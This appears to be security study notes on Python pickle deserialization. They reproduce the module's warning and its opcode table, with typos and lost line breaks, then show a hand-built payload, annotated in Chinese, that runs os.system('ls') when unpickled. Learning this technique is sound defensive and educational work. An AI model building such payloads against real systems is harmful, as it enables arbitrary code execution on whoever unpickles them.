Warning: the pickle moduleisnot intended to be secure angainst erroneous or malicuously constructed data. Never unpickle data received from an untrusted or unauthenticated souorce.
MARK = b'(' # push special markobject on stack STOP = b'.' # every pickle ends with STOP POP = b'0' # discard topmost stack item POP_MARK = b'1' # discard stack top through topmost markobject DUP = b'2' # duplicate top stack item FLOAT = b'F' # push floatobject; decimal string argument INT = b'I' # push integerorbool; decimal string argument BININT = b'J' # push four-byte signed int BININT1 = b'K' # push 1-byte unsigned int LONG = b'L' # push long; decimal string argument BININT2 = b'M' # push 2-byte unsigned int NONE = b'N' # push None PERSID = b'P' # push persistent object; id is taken from string arg BINPERSID = b'Q' # " " " ; " " " " stack REDUCE = b'R' # apply callable to argtuple, both on stack STRING = b'S' # push string; NL-terminated string argument BINSTRING = b'T' # push string; counted binary string argument SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument BINUNICODE = b'X' # " " " ; counted UTF-8 string argument APPEND = b'a' # append stack top to list below it BUILD = b'b' # call __setstate__ or __dict__.update() GLOBAL = b'c' # push self.find_class(modname, name); 2 string args DICT = b'd' # build a dict from stack items EMPTY_DICT = b'}' # push empty dict APPENDS = b'e' # extend list on stack by topmost stack slice GET = b'g' # push item from memo on stack; indexis string arg BINGET = b'h' # " " " " " " ; " " 1-byte arg INST = b'i' # build & push class instance LONG_BINGET = b'j' # push item from memo on stack; indexis4-byte arg LIST = b'l' # build list from topmost stack items EMPTY_LIST = b']' # push empty list OBJ = b'o' # build & push class instance PUT = b'p' # store stack top in memo; indexis string arg BINPUT = b'q' # " " " " " ; " " 1-byte arg LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg SETITEM = b's' # add key+value pair to dict TUPLE = b't' # build tuple from topmost stack items EMPTY_TUPLE = b')' # push empty tuple SETITEMS = b'u' # modify dict by adding topmost key+value pairs BINFLOAT = b'G' # push float; arg is8-byte floatencoding TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
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c<module> <callable> (<args> tR
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cos # import os system # 添加 system() 到 stack (S'ls' # 把当前 stack 存到 metastack(保存os.system),清栈,压入 ls tR. # t-弹出 stack 的内容,转换为 tuple,压入metastack,压入tuple,R-system(('ls',)),.-结束,返回栈顶元素(system('ls'))